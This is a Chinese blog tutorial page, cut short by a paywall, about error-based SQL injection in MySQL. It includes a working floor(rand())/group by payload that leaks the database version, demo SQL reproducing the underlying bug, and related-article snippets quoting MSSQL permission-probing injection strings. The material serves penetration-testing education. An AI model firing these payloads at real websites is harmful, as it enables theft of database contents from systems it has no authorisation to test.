【SQL注入-04】报错注入案例

最新推荐文章于 2024-10-16 09:37:56 发布
最新推荐文章于 2024-10-16 09:37:56 发布
阅读量1.6k 收藏 14
点赞数 2
分类专栏: # 入门07 Web安全之渗透测试 文章标签: 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64378913/article/details/124402076
版权
本文详细介绍了SQL报错注入的概念、原理及常用的命令,如groupby重复键冲突、extractvalue()和updatexml()函数。通过案例展示了如何利用报错注入获取数据库的敏感信息,包括数据库名、表名、字段名和字段内容。同时,总结了SQL注入的优先级顺序,并提醒注意某些函数和命令在某些数据库版本中可能不可用。
摘要由CSDN通过智能技术生成

目录

1 报错注入概述

定义:与union联合查询注入类似,报错注入是利用网站的报错信息来带出我们想要的信息。
报错注入的原理:就是在错误信息中执行sql语句。触发报错的方式很多,具体细节也不尽相同.注意,报错注入可能不一定能成功,可以多刷新几次。

使用优先级:考虑到成功率和时间成本比union成本高,因此该方法在uninon无法实施时再做尝试。

  • union联合查询注入实施的条件是网页能回显我们第二条select语句的内容;
  • 报错注入实施的条件是数据库中sql语句的报错信息,会显示在页面中。

sql注入简单口诀

 是否有回显      				union联合查询注入
 是否有报错    					报错注入
 是否有布尔类型状态				布尔盲注
 绝招(没招的招)				延时注入

2 常用的报错注入命令

2.2 group by重复键冲突(count()+floor()+rand()+group by组合)

该种方式的报错注入只要存在回显报错信息,无论mysql版本是多少,都适用。当一次不成功时,多刷新几次。

利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞。输入命令报错并带回版本信息?id=1 and (select 1 from (select count(*),concat(0x5e,(select version() from information_schema.tables limit 0,1) ,0x5e,floor(rand()*2))x from information_schema.tables group by x)a)floor()为向下取整;rand()为取0~1的随机数;floor(rand()*2)为0或;group by为分类聚合。其中,x 与a 均为别名,其实院语句为...as x...as a,只是as可以省略。0x5e为“^"符号的16进制。

报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主键冗余,导致报错。

在这里插入图片描述

2.2.1 group by重复键冲突的原理及bug演示

关于group by 聚合函数的报错,是mysql的一个bug编号为#8652.当使用rand()函数进行分组聚合时,会产生重复键的错误。
(1)创建数据库,并写入数据

create database groupbyTest;
create table r1 (a int);
insert into r1 values (1),  (2),  (1),  (2),  (1),  (2),  (1),  (2),  (1),  (2);

在这里插入图片描述
(2)简单的查询
select * from r1;
在这里插入图片描述
(3)count()、left()、rand()、group by 的组合应用,产生重复键冲突。还可以利用round()、floor()函数代替left()

select count(*) from r1 group by a;

在这里插入图片描述

select left(rand(),3), a from r1 group by 1;
# group by 1为按照第一列分类聚合
# 由于rand函数的存在,每次执行结果都是不同的

在这里插入图片描述
能否用cont( * )对各随机数出现的次数进行计数,上述sql语句进一步演化如下:

select left(rand(),3), a, count(*
最低0.47元/天 解锁文章
像风一样9
关注
专栏目录
sql注入测试用例
SHELLCODE_8BIT的博客
02-09 651
【代码】sql注入测试用例
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 9798
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
常用的一些注入命令
weixin_33724570的博客
08-02 157
//看看是什么权限的and1=(SelectIS_MEMBER('db_owner'))Andchar(124)%2BCast(IS_MEMBER('db_owner')asvarchar(1))%2Bchar(124)=1;--//检测是否有读取某数据库的权限and1=(SelectHAS_DBACCESS('master'))Andchar(124)%...
记一次实战中sql注入——一个登录框怎么测试?
最新发布
2401_84466223的博客
10-16 608
一个登录框怎么测试?测试步骤:1、首先查找注入点:在登录页面的账户输入admin’密码随便输,返回如下图但是我输入admin’’ 密码随便,返回的又不一样所以我先去bp里面抓包试验一下用sleep()函数实验一下,看能不能触发这个sleep函数果然它睡了五秒所以更加确定这个地方是有注入点的那么接下来构造基本的轮子:Payload:在sleep()函数里面加一个if语句,就是说1=1那个表达式中,如果为真就返回5,否则就返回0这一次也是停了5秒才显示出来的继续构造poc。
sql注入报错注入实例_SQL注入用语法示例解释
cumian8165的博客
08-13 216
sql注入报错注入实例 SQL注入如何工作 (How SQL Injection Works) SQL injection is a malicious technique that is meant to compromise or destroy databases. It is one of the most common web-hacking techniques. SQL注入是一种恶意...
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]
qwsn
01-18 3209
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 报错注入 1、sql server的报错页面 2、SQLSERVER+ASP 报错注入示例
Web安全之SQL注入攻击-报错注入
hack0919的博客
05-10 400
SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响
SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4164
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
sql报错注入实例
xy_259的博客
01-14 496
题目地址 bugku 多次 http://123.206.87.240:9004/ 本地有两个部分,第一关的界面如下, 加上单引号出现报错,再加上23%可以显示正常的界面,发现过滤了很多的字符,在这里用异或(^)的方式检查过滤了哪些字符, 异或:当同时为真或者假的时候为假 然后就可以构造payload;来测试过滤了哪些字符 因为length(‘or’)!=0 为真,所以应该会报错,而此时没...
mysql 注入用例_SQL注入漏洞安全测试(WVS/POST型/手工SQL注入)
weixin_32667439的博客
01-19 869
1、WVS自动化SQL注入测试n 测试目的:测试网站是否存在SQL注入漏洞。n 测试用例:1) Scansettings选择sql injection策略;2) 输入扫描网站URL,一直下一步(如果需要登陆点击New Login Sqquence);3) 如果扫描结果如下显示,则网站不通过;5) 针对get形式url中存在多个参数,可以通过-p选项指定。2、W...
SQL注入---报错注入
zhoutong2323的博客
04-04 1150
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
SQL基本注入演示
xiaoi123的博客
12-14 484
作者:ZERO 所属团队:Arctic Shell 参考文献:《sql注入攻击与防御》 使用平台:pikachu漏洞练习平台 导语:  在owasp发布的top10排行榜中注入漏洞一直是危害排名极高的漏洞,数据库注入一直是web中一个令人头疼的问题。   一个严重的SQL注入漏洞,可能会直接导致一家公司破产!这并不是戏言,其实SQL注入漏洞最主要的形成原因是在进行数据交互中,当前端的数据传...
软件注入攻击测试,SQL注入测试用例
weixin_34163588的博客
07-25 714
//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_...
登录测试用例sql语句注入
weixin_34195142的博客
08-11 2688
利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意。读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句 早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。   如今,谈SQ...
SQL注入03】报错注入实例操作
Fighting_hawk的博客
02-18 3596
1. SQL注入优先级:union注入>报错注入>布尔盲注>延迟注入; 2. 了解报错注入常用的几个命令; 3. 掌握使用updataxml()函数进行报错注入; 4. updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。...
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2642
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
PHP+MySQL 网站 SQL 注入攻击测试用例
12-02 1266
SQL注入攻击测试用例 说明 Night Night’ and 1=1# Night’ and 1=2# 判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同 Night’ or 1=1# 返回所有数据,常用于有搜索功能的页面 Nigh
group by 重复健冲
09-06
在数据库中,使用 GROUP BY 子句可以根据指定的列对结果集进行分组。但是,如果在 GROUP BY 子句中存在重复的键(冲突),则会导致问题。 当使用 GROUP BY 子句时,每个分组的键必须是唯一的。如果存在重复的键,则会将这些记录归为同一组。这可能会导致结果集中的某些数据被错误地合并或计算。 为了避免重复键冲突,可以采取以下措施之一: 1. 仔细选择需要进行分组的列,确保它们具有唯一性。 2. 在 GROUP BY 子句中使用更多的列,以便增加分组的唯一性。 3. 使用聚合函数(如 SUM、COUNT、AVG 等)对需要合并的数据进行汇总,而不是简单地根据列进行分组。 请记住,在使用 GROUP BY 子句时,要确保理解你的数据模型和查询需求,以避免出现重复键冲突的问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值